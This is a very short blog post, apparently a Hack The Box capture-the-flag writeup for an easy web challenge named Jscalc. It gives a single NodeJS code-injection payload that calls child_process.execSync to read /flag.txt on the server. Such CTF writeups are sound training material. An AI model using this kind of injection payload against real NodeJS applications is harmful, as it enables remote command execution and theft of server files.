Jscalc Posted Mar 29, 2025 By Heland views 1 min read Jscalc Contents Jscalc SOLUTIONWe download the zip file, unzip it and we have package.json. We know that the web is running on NodeJS server. So we can do some NodeJS RCE. 1 require( 'child_process') ,execSync( 'cat /flag.txt').toString( ) HTB-challenge, web, easy HTB CTF writeup nodejs Share